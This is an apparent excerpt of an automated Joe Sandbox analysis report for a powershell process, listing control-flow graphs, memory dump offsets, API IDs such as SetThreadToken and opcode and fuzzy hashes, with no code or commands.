                                                                                                                                                                        control_flow_graph 209 7913ce8-7913d0d 211 7913f00-7913f08 209->211 212 7913d13-7913d18 209->212 222 7913f0a-7913f4a 211->222 223 7913ecf-7913ed2 211->223 213 7913d30-7913d34 212->213 214 7913d1a-7913d20 212->214 217 7913eb0-7913eba 213->217 218 7913d3a-7913d3c 213->218 215 7913d22 214->215 216 7913d24-7913d2e 214->216 215->213 216->213 224 7913ec8-7913ece 217->224 225 7913ebc-7913ec5 217->225 220 7913d4c 218->220 221 7913d3e-7913d4a 218->221 227 7913d4e-7913d50 220->227 221->227 228 7913f50-7913f55 222->228 229 79140ce-79140d4 222->229 231 7913ee2-7913efd 223->231 224->223 230 7913ed4-7913ee0 224->230 227->217 232 7913d56-7913d75 227->232 233 7913f57-7913f5d 228->233 234 7913f6d-7913f71 228->234 242 79140d6-7914108 229->242 243 791409b 229->243 230->231 260 7913d85 232->260 261 7913d77-7913d83 232->261 240 7913f61-7913f6b 233->240 241 7913f5f 233->241 237 7914080-791408a 234->237 238 7913f77-7913f79 234->238 244 7914097 237->244 245 791408c-7914094 237->245 246 7913f89 238->246 247 7913f7b-7913f87 238->247 240->234 241->234 250 7914109 242->250 243->250 252 791409d 243->252 244->243 251 7913f8b-7913f8d 246->251 247->251 254 7914113-791411d 250->254 255 791410b-7914112 250->255 251->237 256 7913f93-7913fb2 251->256 257 79140a3-79140af 252->257 258 791409f-79140a1 252->258 263 7914135-7914139 254->263 264 791411f-7914125 254->264 255->254 262 7914228-7914230 255->262 293 7913fc2 256->293 294 7913fb4-7913fc0 256->294 265 79140b1-79140cb 257->265 258->265 266 7913d87-7913d89 260->266 261->266 281 79141f7 262->281 285 7914232-791425d 262->285 271 79141da-79141e4 263->271 272 791413f-7914141 263->272 267 7914127 264->267 268 7914129-7914133 264->268 266->217 275 7913d8f-7913d96 266->275 267->263 268->263 273 79141f1 271->273 274 79141e6-79141ee 271->274 278 7914151 272->278 279 7914143-791414f 272->279 273->281 275->211 282 7913d9c-7913da1 275->282 280 7914153-7914155 278->280 279->280 280->271 288 791415b-791415d 280->288 289 79141f9-79141fb 281->289 290 79141fd-7914209 281->290 291 7913da3-7913da9 282->291 292 7913db9-7913dc8 282->292 286 791428b-7914295 285->286 287 791425f-7914281 285->287 301 7914297-791429c 286->301 302 791429f-79142a5 286->302 325 7914283-7914288 287->325 326 79142d5-79142fe 287->326 296 7914177-791417e 288->296 297 791415f-7914165 288->297 298 791420b-7914225 289->298 290->298 299 7913dab 291->299 300 7913dad-7913db7 291->300 292->217 318 7913dce-7913dec 292->318 303 7913fc4-7913fc6 293->303 294->303 308 7914180-7914186 296->308 309 7914196-79141d7 296->309 305 7914167 297->305 306 7914169-7914175 297->306 299->292 300->292 311 79142a7-79142a9 302->311 312 79142ab-79142b7 302->312 303->237 313 7913fcc-7914003 303->313 305->296 306->296 315 7914188 308->315 316 791418a-7914194 308->316 319 79142b9-79142d2 311->319 312->319 337 7914005-791400b 313->337 338 791401d-7914024 313->338 315->309 316->309 318->217 336 7913df2-7913e17 318->336 343 7914300-7914326 326->343 344 791432d-791434a 326->344 336->217 356 7913e1d-7913e24 336->356 341 791400d 337->341 342 791400f-791401b 337->342 345 7914026-791402c 338->345 346 791403c-791407d 338->346 341->338 342->338 343->344 354 7914354-791435c 344->354 355 791434c 344->355 348 7914030-791403a 345->348 349 791402e 345->349 348->346 349->346 358 7914395-791439f 354->358 359 791435e-791437b 354->359 355->354 360 7913e26-7913e41 356->360 361 7913e6a-7913e9d 356->361 363 79143a1-79143a5 358->363 364 79143a8-79143ae 358->364 370 79143e5-79143ea 359->370 371 791437d-791438f 359->371 372 7913e43-7913e49 360->372 373 7913e5b-7913e5f 360->373 384 7913ea4-7913ead 361->384 367 79143b0-79143b2 364->367 368 79143b4-79143c0 364->368 374 79143c2-79143e2 367->374 368->374 370->371 371->358 376 7913e4b 372->376 377 7913e4d-7913e59 372->377 381 7913e66-7913e68 373->381 376->373 377->373 381->384
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$W
                                                                                                                                                                        • API String ID: 0-557959733
                                                                                                                                                                        • Opcode ID: a33d4ba284401b5be8a7c55dcf3d338138b1a8b440282e61c80544256bf68d8e
                                                                                                                                                                        • Instruction ID: 0b4cf25b18f1c5f5e72158ac8a318de6acea1423ddee3cde4c76a36331385a9d
                                                                                                                                                                        • Opcode Fuzzy Hash: a33d4ba284401b5be8a7c55dcf3d338138b1a8b440282e61c80544256bf68d8e
                                                                                                                                                                        • Instruction Fuzzy Hash: D61297F2B0034A8FCB148B68C90176ABBB69FD9319F1484BAD505CF291DB31DC66C7A1

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 517 8c06652-8c06693 518 8c0669b-8c066c7 SetThreadToken 517->518 519 8c066d0-8c066ed 518->519 520 8c066c9-8c066cf 518->520 520->519
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1895242350.0000000008C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_8c00000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ThreadToken
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3254676861-0
                                                                                                                                                                        • Opcode ID: a05ea405d956af5331927bc80f84cbf2d15edc5c95ebe48be822882af1218920
                                                                                                                                                                        • Instruction ID: 9af29d0e057484a65af1a3a5ddcc0c653123ee3ae85ecf06d920252ab8cc0626
                                                                                                                                                                        • Opcode Fuzzy Hash: a05ea405d956af5331927bc80f84cbf2d15edc5c95ebe48be822882af1218920
                                                                                                                                                                        • Instruction Fuzzy Hash: 591113B5D003498FCB10DF9AC984B9EFBF4EF88324F24845AD469A7250C774A944CFA4

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 523 8c06658-8c066c7 SetThreadToken 525 8c066d0-8c066ed 523->525 526 8c066c9-8c066cf 523->526 526->525
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1895242350.0000000008C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_8c00000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ThreadToken
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3254676861-0
                                                                                                                                                                        • Opcode ID: 8c990110a66aacbc91b7f640985aaabce48bc33583169a32da03a92135e64a83
                                                                                                                                                                        • Instruction ID: 28647f04db6dca7cadecb760e0c3c6a0167c8b5fc81e5211a9c891015aca9401
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c990110a66aacbc91b7f640985aaabce48bc33583169a32da03a92135e64a83
                                                                                                                                                                        • Instruction Fuzzy Hash: AC11F2B5D003088FCB10DF9AC885B9EFBF8EB88324F24841AD559A7350C774A944CFA5

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 529 3396fe0-3396fff 530 3397105-3397143 529->530 531 3397005-3397008 529->531 558 339700a call 339767c 531->558 559 339700a call 3397697 531->559 532 3397010-3397022 534 339702e-3397043 532->534 535 3397024 532->535 540 3397049-3397059 534->540 541 33970ce-33970e7 534->541 535->534 544 339705b 540->544 545 3397065-3397073 call 339bf20 540->545 547 33970e9 541->547 548 33970f2-33970f3 541->548 544->545 551 3397079-339707d 545->551 547->548 548->530 552 33970bd-33970c8 551->552 553 339707f-339708f 551->553 552->540 552->541 554 33970ab-33970b5 553->554 555 3397091-33970a9 553->555 554->552 555->552 558->532 559->532
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: (bq
                                                                                                                                                                        • API String ID: 0-149360118
                                                                                                                                                                        • Opcode ID: fbe7231e8215b19e3db2c5ba17372826c1a085135ae4526d5b1fb3961acda96b
                                                                                                                                                                        • Instruction ID: b4e32518a397e9b47343d076e433863a97bd1440386a19cdf0c5c2701334a0f8
                                                                                                                                                                        • Opcode Fuzzy Hash: fbe7231e8215b19e3db2c5ba17372826c1a085135ae4526d5b1fb3961acda96b
                                                                                                                                                                        • Instruction Fuzzy Hash: 99413C34B14205CFDB18DB69C498AAEBBF6EF8D715F1944A9D406AB391CB35DC01CB60

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 561 339afa8-339afb1 call 339a79c 563 339afb6-339afba 561->563 564 339afca-339b065 563->564 565 339afbc-339afc9 563->565 572 339b06e-339b08b 564->572 573 339b067-339b06d 564->573 573->572
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: (&^q
                                                                                                                                                                        • API String ID: 0-2067289071
                                                                                                                                                                        • Opcode ID: f2a99950cff8425fedb29d5d57711fd67aab01ebbc8d5dda6cc8a3c26682eab5
                                                                                                                                                                        • Instruction ID: e1b68ff294e16c95f4bee05dbba5fbc3e13a15e55284948c42ef065a1f870471
                                                                                                                                                                        • Opcode Fuzzy Hash: f2a99950cff8425fedb29d5d57711fd67aab01ebbc8d5dda6cc8a3c26682eab5
                                                                                                                                                                        • Instruction Fuzzy Hash: 1F219F75A043188FDB14DBAED844BAEBBF5EB89320F14846AD119A7340CA74A805CBA5

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 685 33929f0-3392a1e 686 3392af5-3392b37 685->686 687 3392a24-3392a3a 685->687 691 3392b3d-3392b56 686->691 692 3392c51-3392c61 686->692 688 3392a3c 687->688 689 3392a3f-3392a52 687->689 688->689 689->686 696 3392a58-3392a65 689->696 694 3392b58 691->694 695 3392b5b-3392b69 691->695 694->695 695->692 702 3392b6f-3392b79 695->702 697 3392a6a-3392a7c 696->697 698 3392a67 696->698 697->686 706 3392a7e-3392a88 697->706 698->697 704 3392b7b-3392b7d 702->704 705 3392b87-3392b94 702->705 704->705 705->692 709 3392b9a-3392baa 705->709 707 3392a8a-3392a8c 706->707 708 3392a96-3392aa6 706->708 707->708 708->686 712 3392aa8-3392ab2 708->712 710 3392bac 709->710 711 3392baf-3392bbd 709->711 710->711 711->692 716 3392bc3-3392bd3 711->716 713 3392ac0-3392af4 712->713 714 3392ab4-3392ab6 712->714 714->713 718 3392bd8-3392be5 716->718 719 3392bd5 716->719 718->692 722 3392be7-3392bf7 718->722 719->718 723 3392bf9 722->723 724 3392bfc-3392c08 722->724 723->724 724->692 727 3392c0a-3392c24 724->727 728 3392c29 727->728 729 3392c26 727->729 730 3392c2e-3392c38 728->730 729->728 731 3392c3d-3392c50 730->731
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 71bbdffc3a9d568ca69ce400109a871748f7485d10899a33a4bddb4b7fb3d00d
                                                                                                                                                                        • Instruction ID: d95f5445fd4cff6b98eadf3d6f3e71af7fc154aed62ef122fb5a96955af114b4
                                                                                                                                                                        • Opcode Fuzzy Hash: 71bbdffc3a9d568ca69ce400109a871748f7485d10899a33a4bddb4b7fb3d00d
                                                                                                                                                                        • Instruction Fuzzy Hash: 69914874A00649DFCB15CF58C8D49AAFBB1FF48310B28899AD915EB365C736EC51CBA0

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 867 3397740-3397776 870 3397778-339777a 867->870 871 339777f-3397788 867->871 872 3397829-339782e 870->872 874 339778a-339778c 871->874 875 3397791-33977af 871->875 874->872 878 33977b1-33977b3 875->878 879 33977b5-33977b9 875->879 878->872 880 33977c8-33977cf 879->880 881 33977bb-33977c0 879->881 882 339782f-3397860 880->882 883 33977d1-33977fa 880->883 881->880 893 33978e2-33978e6 882->893 894 3397866-33978bd 882->894 886 3397808 883->886 887 33977fc-3397806 883->887 889 339780a-3397816 886->889 887->889 895 3397818-339781a 889->895 896 339781c-3397823 889->896 907 33978e9 call 3397940 893->907 908 33978e9 call 3397932 893->908 903 33978c9-33978d7 894->903 904 33978bf 894->904 895->872 896->872 898 33978ec-33978f1 903->893 906 33978d9-33978e1 903->906 904->903 907->898 908->898
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 89b02770fbe2eff998a7b2ed1311dda417b34ead60c6b9e294da0bd1d13b5570
                                                                                                                                                                        • Instruction ID: 5413156b11979c792c15f47f2234235485ddadad99c5201f0c6afe5250769fc6
                                                                                                                                                                        • Opcode Fuzzy Hash: 89b02770fbe2eff998a7b2ed1311dda417b34ead60c6b9e294da0bd1d13b5570
                                                                                                                                                                        • Instruction Fuzzy Hash: 5751D435314205DFEB14DB79DC84A2A77EAFFC9216B1888AAE509CB391DB35DC01C790

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 909 339bad0-339bb60 913 339bb62 909->913 914 339bb66-339bb71 909->914 913->914 915 339bb73 914->915 916 339bb76-339bbd0 call 339afa8 914->916 915->916 923 339bc21-339bc25 916->923 924 339bbd2-339bbd7 916->924 925 339bc27-339bc31 923->925 926 339bc36 923->926 924->923 927 339bbd9-339bbfc 924->927 925->926 928 339bc3b-339bc3d 926->928 929 339bc02-339bc0d 927->929 930 339bc3f-339bc60 928->930 931 339bc62-339bc65 call 339a790 928->931 932 339bc0f-339bc15 929->932 933 339bc16-339bc1f 929->933 935 339bc6a-339bc6e 930->935 931->935 932->933 933->928 938 339bc70-339bc99 935->938 939 339bca7-339bcd6 935->939 938->939
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9f1f6401a7c385a4267e518ec760c27c0ce4311deda48907af9b71d5cc234c04
                                                                                                                                                                        • Instruction ID: b493b67bf96b6d5e1c907ffc31b8e40407dec6faa21efd39e9b22286b545e44b
                                                                                                                                                                        • Opcode Fuzzy Hash: 9f1f6401a7c385a4267e518ec760c27c0ce4311deda48907af9b71d5cc234c04
                                                                                                                                                                        • Instruction Fuzzy Hash: 42610275E00208DFDB14DFA9D884A9DFBF5EF88310F19812AE819AB254DB70AC41CF60
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0fc4708e62287dc6650a4f90d9926333291b5f626e7b73e31df8d6b3f030e07b
                                                                                                                                                                        • Instruction ID: 4b7f2b086b32f6a599b2fb13f999a10cea2f9950d21d86e32b99717bfaa9877c
                                                                                                                                                                        • Opcode Fuzzy Hash: 0fc4708e62287dc6650a4f90d9926333291b5f626e7b73e31df8d6b3f030e07b
                                                                                                                                                                        • Instruction Fuzzy Hash: ED510574E00248DFDB14DFA9D884A9DFBF5EF88311F19802AE819AB364DB709845CF60
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: cbdf48ad5ab9e8e17e84bb8b5b138da419e125890e8f07332c15b3f33a0041b2
                                                                                                                                                                        • Instruction ID: 7ef13ab7226b45fc9d5ed5001d2d50a609a67982c33698a8fb3ca82509fd1ebc
                                                                                                                                                                        • Opcode Fuzzy Hash: cbdf48ad5ab9e8e17e84bb8b5b138da419e125890e8f07332c15b3f33a0041b2
                                                                                                                                                                        • Instruction Fuzzy Hash: F74145F2B0030ACBCB258F64C50166A7BB7AF84348F18C4A9D900CF256C731ED6AC7A1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: bd73be54d4608d9620b957e6c0c5e73ea99944b8166a1f011cf1542579aefa6d
                                                                                                                                                                        • Instruction ID: 362dc1b9e095f39d5222c79889c455b0b3f85ad2ccad4fc6869f5e63f6e9c1d3
                                                                                                                                                                        • Opcode Fuzzy Hash: bd73be54d4608d9620b957e6c0c5e73ea99944b8166a1f011cf1542579aefa6d
                                                                                                                                                                        • Instruction Fuzzy Hash: 6E4107B4A00609DFDB06CF58C4D89AAFBB1FF48310B15859AD915AB365C736EC51CFA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: dbf6287ba675dcdcf4898eb01b229227e93c189ec20b98f0a0d6b2f682a403e9
                                                                                                                                                                        • Instruction ID: 75031780e9f6e63f40db3e81edf0e273007bf26a21f10aba794ea02ce92ee5a1
                                                                                                                                                                        • Opcode Fuzzy Hash: dbf6287ba675dcdcf4898eb01b229227e93c189ec20b98f0a0d6b2f682a403e9
                                                                                                                                                                        • Instruction Fuzzy Hash: B6416D34B14245CFDB15DB68C898AAEBFF1AF8D315F1940AAD442AB392CB35DC41CB61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9691d913680bbee2eefbdc99f82f8960bb9261c1d21ccf8668bb48baff7d2b2b
                                                                                                                                                                        • Instruction ID: 3165d4f439d214e40c59b4f7a4e52cb0209908f326bd3df7da70fbe656472cc2
                                                                                                                                                                        • Opcode Fuzzy Hash: 9691d913680bbee2eefbdc99f82f8960bb9261c1d21ccf8668bb48baff7d2b2b
                                                                                                                                                                        • Instruction Fuzzy Hash: 2531AE353002119FD705EB78E894B9ABBE6EFD4216F048629E60ACB351DF74AC45CBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: eb06f3fee0e2c454a918ec829f3ac6265ddcbd3064adb1ffcf2c1e86796ac87d
                                                                                                                                                                        • Instruction ID: eb4b3d09f143364d4493ef07fab2b48a577e50f05a2c401e531aa5a2f735fb2f
                                                                                                                                                                        • Opcode Fuzzy Hash: eb06f3fee0e2c454a918ec829f3ac6265ddcbd3064adb1ffcf2c1e86796ac87d
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B318E74E002098FDB04DFA9C894BAEBBF6EF89300F14812AE506EB350EB709C01CB50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 3474f9891839da81c2e21a72f86377df9ccc7a3b10745e40e052c16d02edf241
                                                                                                                                                                        • Instruction ID: dbdfa906ca102ba63e06299809dbe5aea12eaff5337845766bd9a037ed25be84
                                                                                                                                                                        • Opcode Fuzzy Hash: 3474f9891839da81c2e21a72f86377df9ccc7a3b10745e40e052c16d02edf241
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D31D53590E7D69FDB07DB689CA45DABF70EF57224B0945C3C094CB1A3C6298C0AC762
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 359c772b1607d6ddd5e1e5fa5720f9105dfbc57bfcead0de6fc62a7d2c149de6
                                                                                                                                                                        • Instruction ID: 10044cb2ea721796c0cbe2e807a6d9effa08fb771e9407a372e0b15791c11585
                                                                                                                                                                        • Opcode Fuzzy Hash: 359c772b1607d6ddd5e1e5fa5720f9105dfbc57bfcead0de6fc62a7d2c149de6
                                                                                                                                                                        • Instruction Fuzzy Hash: CC3194B8A003089FDB04EF64D894AAE7BB2EF85301F1184A9D215AF395DA789D41CB91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1da43d57a7b31a764097431a3e12cfa3b75f28ee34f135017420d294c9d801e5
                                                                                                                                                                        • Instruction ID: 3e922c78d93ade071d6834f244e03067eda8c2569cebec383854646938a215f9
                                                                                                                                                                        • Opcode Fuzzy Hash: 1da43d57a7b31a764097431a3e12cfa3b75f28ee34f135017420d294c9d801e5
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A314B74E002098FDF05DFA9D8947AEBBF6AF89304F15816AE506EB350EA749C018B55
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b8b199ca8773104338c6251bbfb14fcd1263ee72df5f6a10e2f74aa49c38e61c
                                                                                                                                                                        • Instruction ID: 4600b6be11805be9711a9b5720a97154a025f11674fd1af2ef0d4395804f5fb9
                                                                                                                                                                        • Opcode Fuzzy Hash: b8b199ca8773104338c6251bbfb14fcd1263ee72df5f6a10e2f74aa49c38e61c
                                                                                                                                                                        • Instruction Fuzzy Hash: 4A316C34A002048FDB14DF69D498A9DBBF6BF88318F15446AD446EB3A1CF75AC85CB91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0869611361dc86426cc1524a4a450152ef3edff1fd23e159307f8c417689b85e
                                                                                                                                                                        • Instruction ID: d9aeeacd38114278e45af0924cc31f7fa3e18a6745aef071b334f5b051bb9672
                                                                                                                                                                        • Opcode Fuzzy Hash: 0869611361dc86426cc1524a4a450152ef3edff1fd23e159307f8c417689b85e
                                                                                                                                                                        • Instruction Fuzzy Hash: BF316B74A002048FCB08DF69D498A9EBBF6FF88318F05446AD406EB391CF75AC85CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 21b440a17e71b5e3eeff9083e78df3561c2158a3c123453b9820c21c0d58bb1c
                                                                                                                                                                        • Instruction ID: aa8a1bfb17f7ce1a10ae3470d7b996bf1212795843fae7808328404307c5b139
                                                                                                                                                                        • Opcode Fuzzy Hash: 21b440a17e71b5e3eeff9083e78df3561c2158a3c123453b9820c21c0d58bb1c
                                                                                                                                                                        • Instruction Fuzzy Hash: C8313CB8E002099FDB04EFA4D894ABEB7B2EF84301F118469D215AF394DA799D418B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 75fb4f810ce1f64afd56f74708e898e8a88e10c158c70e6d53b0939e1f8e1daf
                                                                                                                                                                        • Instruction ID: c59d1dacb1a2edac7b06ba2f134d8264abf06e412623969312d391eaed5c7a29
